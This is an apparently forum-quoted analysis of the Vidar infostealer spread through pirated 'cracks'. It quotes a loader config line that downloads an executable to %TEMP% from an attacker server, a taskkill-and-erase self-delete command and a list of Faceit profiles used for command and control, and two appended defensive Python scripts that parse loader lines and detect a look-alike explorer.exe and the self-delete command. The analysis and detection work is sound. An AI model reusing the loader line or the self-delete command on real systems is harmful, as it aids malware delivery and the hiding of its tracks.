Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
<blockquote data-quote="Ghosthunter" data-source="post: 503" data-attributes="member: 6"><h4>6. Installing additional malware</h4><p>This step is mandatory and is always performed. The following line in the configuration file is responsible for it:</p><p>ldr_1:http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe</p><p>The choice of payload the malware loads is left to the attacker. The analyzed sample contained the ordinary SpyBee Java keylogger, which is publicly available on GitHub. A controversial choice; why it was chosen is a mystery.</p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png" alt="e950da1c86292dc26fc4a5786fb2ecb7.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p>This line also shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure.</p><h4>7. Self-destruct</h4><p>Raccoon had no such step: once launched on the victim's device, it stayed there until it was removed. Vidar, on the other hand, can sneak into the system, do all its dirty work, and leave unnoticed.</p><p>Deletion is done in a very primitive way: the following line is run via Windows cmd.exe:</p><p>"C:\Windows\System32\cmd.exe" /c taskkill /im [Filename] /f & erase [File path] & exit</p><h4>A brief dynamic analysis of the malware</h4><p>All tests are performed on a virtual machine. Do not repeat this yourself, least of all on your main device.</p><p>For dynamic analysis we have the following set of utilities (all of them publicly available):</p><ol> <li data-xf-list-type="ol">ProcessHacker, simple and tasteful: lets us watch how the malware interacts with DLLs and the system.</li> <li data-xf-list-type="ol">TCPView, a utility that tracks outgoing TCP connections.</li> <li data-xf-list-type="ol">Regshot, a very simple open-source application that shows the changes made to the registry after the malware is run.</li> </ol><p>We take a snapshot of the Windows registry, open all our utilities and carefully watch what happens.</p><p>Immediately after the malware is opened, a second explorer.exe process appears on the virtual machine, with a capital "I" in place of the lowercase "l" in its name. This is a favourite disguise of malware, and an inexperienced user is unlikely to tell the real explorer from the fake one.</p><p>First, Vidar sends a GET request to the IP address 104.17.63.50. As expected, this server belongs to the FACEIT.com service.</p><p>Next, the malicious process connects to the server 93.184.220.29. I remind you that this server was responsible for delivering the additional malware to the victim's machine.</p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/646/4ac/628/6464ac6281001c3bdd4f44f67bf8da4c.png" alt="6464ac6281001c3bdd4f44f67bf8da4c.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p>After 30 seconds the process disappears from view. Had Java been installed on my machine, the SpyBee keylogger would have started; since the runtime is absent, there is no secondary malware either.</p><p>Comparing the registry snapshots, you can clearly see how Vidar covered its tracks by deleting itself:</p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/67c/c63/108/67cc631087d899a3dfe0a732b8f11a50.png" alt="67cc631087d899a3dfe0a732b8f11a50.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p>On top of that, the malware also removed the Solitaire game (Kosynka). What for? Why? Riddle of the century.</p><h4>Some analysis of the Faceit profile and its API</h4><p>So, we have the attacker's nickname, and the account is currently active. Not a single game has been played on it; it just sits there as a placeholder.</p><p>This particular account was registered on December 15, 2022 in Russia, almost three months ago.</p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/fef/b9b/527/fefb9b5277d42972a501b1d423b684d2.png" alt="fefb9b5277d42972a501b1d423b684d2.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p><u>Earlier, Cyble researchers</u> found several more such profiles used as C&C servers.</p><p>List of profiles</p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/yetveirrifcu" target="_blank">https://api.faceit.com/core/v1/nicknames/yetveirrifcu</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/tronhack" target="_blank">https://api.faceit.com/core/v1/nicknames/tronhack</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/slowyen" target="_blank">https://api.faceit.com/core/v1/nicknames/slowyen</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/sergeevih" target="_blank">https://api.faceit.com/core/v1/nicknames/sergeevih</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/dendytest" target="_blank">https://api.faceit.com/core/v1/nicknames/dendytest</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/xeronxik123" target="_blank">https://api.faceit.com/core/v1/nicknames/xeronxik123</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/vyh62lapin" target="_blank">https://api.faceit.com/core/v1/nicknames/vyh62lapin</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/sslamlssa" target="_blank">https://api.faceit.com/core/v1/nicknames/sslamlssa</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/ramilgame" target="_blank">https://api.faceit.com/core/v1/nicknames/ramilgame</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/legomind" target="_blank">https://api.faceit.com/core/v1/nicknames/legomind</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/pavel23puef" target="_blank">https://api.faceit.com/core/v1/nicknames/pavel23puef</a></u></em></p><p>They change every few days, so it is still impossible to track them and stop their work.</p><h4>Conclusions</h4><p>So, we have analyzed in detail the specifics of the Vidar malware, which was distributed through pirate sites alongside the Raccoon Stealer.</p><p>Both pieces of malware are very similar and clearly came from the pen of one team or one person, as their concept of operation is the same.</p><p>What is really unusual is that Vidar used the API of a public gaming service as its command server.</p><p>It is noteworthy that the malware is updated very frequently and not all antivirus programs are able to detect it. But since Vidar is not distributed through critical vulnerabilities or droppers, it is enough simply not to download those "cracks" from the search engine, and you will be happy, dear readers.</p><p>That's all from me. See you.</p></blockquote>
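The ldr_1 line quoted in section 6 of the post has a fixed shape: a loader id, the download URL, the destination directory given as a Windows environment variable, and the type the dropped file is run as, joined by "|". The parser below is an added example, not part of Ghosthunter's post or of the original article, that turns such lines into IOC records an analyst can block and hunt on. Only the first sample line comes from the post; the second (a hypothetical .dll loader written with "%7C" in place of "|", the form the same line takes when it is copied out of an href or a sandbox report) and the ENV_DEFAULTS paths are constructed for illustration.

```python
"""Parse Vidar-style 'ldr_N' loader lines into IOC records (added example)."""
import re
from urllib.parse import urlsplit

LDR_LINE = re.compile(r"^(?P<loader>ldr_\d+):(?P<body>.+)$")

# Typical per-user defaults for the variables seen in loader lines (assumption:
# stock Windows install; used only to make the records readable for an analyst).
ENV_DEFAULTS = {
    "%TEMP%": r"C:\Users\<user>\AppData\Local\Temp",
    "%APPDATA%": r"C:\Users\<user>\AppData\Roaming",
}

# Constructed config block: line 1 is the one quoted in the post, line 2 is a
# hypothetical variant in the URL-encoded form ('%7C' instead of '|').
SAMPLE_CONFIG = """\
ldr_1:http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\\|exe
ldr_2:http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/second.dll%7C%APPDATA%\\%7Cdll
"""


def parse_loader_line(line):
    """Return a record for one 'ldr_N:URL|DIR|TYPE' line, or None if malformed."""
    m = LDR_LINE.match(line.strip())
    if not m:
        return None
    # Only the pipe separator is decoded: a blanket percent-decode would mangle
    # env-var names such as %CD% whose letters happen to be valid hex digits.
    body = re.sub(r"%7[cC]", "|", m.group("body"))
    parts = body.split("|")
    if len(parts) != 3:
        return None
    url, dest, kind = (p.strip() for p in parts)
    split = urlsplit(url)
    if split.scheme not in ("http", "https") or not split.hostname:
        return None
    dest_var = dest.rstrip("\\/")  # '%TEMP%\' -> '%TEMP%'
    return {
        "loader": m.group("loader"),
        "url": url,
        "host": split.hostname,
        "filename": split.path.rsplit("/", 1)[-1],
        "drop_dir": dest_var,
        "drop_dir_expanded": ENV_DEFAULTS.get(dest_var.upper(), dest_var),
        "exec_type": kind.lower(),
    }


def parse_config(text):
    """Parse every loader line in a config dump; non-loader lines are skipped."""
    records = []
    for line in text.splitlines():
        rec = parse_loader_line(line)
        if rec:
            records.append(rec)
    return records


def network_iocs(records):
    """Hosts to block or hunt for, derived from the loader records."""
    return sorted({r["host"] for r in records})


if __name__ == "__main__":
    recs = parse_config(SAMPLE_CONFIG)
    for rec in recs:
        print(rec)
    print("hosts:", network_iocs(recs))
```

The records keep both the raw variable and an expanded path, so a hunt query can match either the literal string in a config dump or the directory on disk; the host list is what goes into a blocklist or a proxy-log search.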
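The dynamic-analysis section describes two behaviours that are cheap to hunt for on an endpoint: an explorer.exe look-alike whose name swaps a capital "I" for the lowercase "l", and the self-delete command line from section 7. The script below is an added example, not from the post or the article, that runs both checks over a few constructed Sysmon-style process-creation events; the PIDs, the "crack" folder and the file names are made up, and the list of system binaries is deliberately short. It goes slightly beyond the post in two places: the look-alike check folds every common I/l/1/| and 0/O confusable rather than only the one pair seen here, and "del" is accepted as well as "erase", since cmd.exe treats them as the same command.

```python
"""Hunt for homoglyph process names and taskkill-then-erase self-delete lines
in process-creation events (added example; events below are constructed)."""
import re

# Constructed Sysmon-style events: pid, image path, command line.
EVENTS = [
    {"pid": 1204, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 3388, "image": r"C:\Users\analyst\Desktop\crack\expIorer.exe",
     "cmdline": r'"C:\Users\analyst\Desktop\crack\expIorer.exe"'},
    {"pid": 3412, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c taskkill /im expIorer.exe /f '
                r'& erase C:\Users\analyst\Desktop\crack\expIorer.exe & exit'},
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# System binaries the look-alike check is run against (short list for the example).
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe"}


def skeleton(name):
    """Collapse characters that render alike in common UI fonts, so 'expIorer'
    and 'explorer' map to the same string. Only I/l/1/| and 0/O are folded."""
    out = []
    for ch in name:
        if ch in "Il1|":
            out.append("l")
        elif ch in "0O":
            out.append("o")
        else:
            out.append(ch.lower())
    return "".join(out)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def find_masquerades(events):
    """(pid, name, impersonated) for processes whose name is a homoglyph of a
    system binary but is not the genuine (case-insensitive) name."""
    hits = []
    for ev in events:
        name = basename(ev["image"])
        if name.lower() in SYSTEM_BINARIES:
            continue  # exact match: the real binary name, nothing to flag
        for legit in SYSTEM_BINARIES:
            if skeleton(name) == skeleton(legit):
                hits.append((ev["pid"], name, legit))
    return hits


# The pattern the post quotes: taskkill /im <name> /f & erase <path> & exit
SELF_DELETE = re.compile(
    r"taskkill\s+/im\s+(?P<image>\S+)\s+/f\s*&\s*(?:erase|del)\s+(?P<path>.+?)\s*&\s*exit",
    re.IGNORECASE,
)


def find_self_deletes(events):
    """(pid, killed image name, erased path) for every matching command line."""
    hits = []
    for ev in events:
        m = SELF_DELETE.search(ev["cmdline"])
        if m:
            hits.append((ev["pid"], m.group("image"), m.group("path").strip('"')))
    return hits


if __name__ == "__main__":
    print("masquerades:", find_masquerades(EVENTS))
    print("self-deletes:", find_self_deletes(EVENTS))
```

The self-delete match is the more useful alert of the two in practice: by the time it fires the dropped file is gone from disk, so the erased path it extracts is exactly the artifact to pull from the Sysmon file-create history or a volume shadow copy before the trail goes cold.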